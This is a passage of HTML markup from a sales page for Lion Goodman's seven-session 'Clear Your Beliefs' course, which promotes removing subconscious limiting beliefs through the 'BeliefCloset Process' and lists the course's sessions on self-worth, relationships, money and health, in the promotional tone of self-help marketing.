you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a 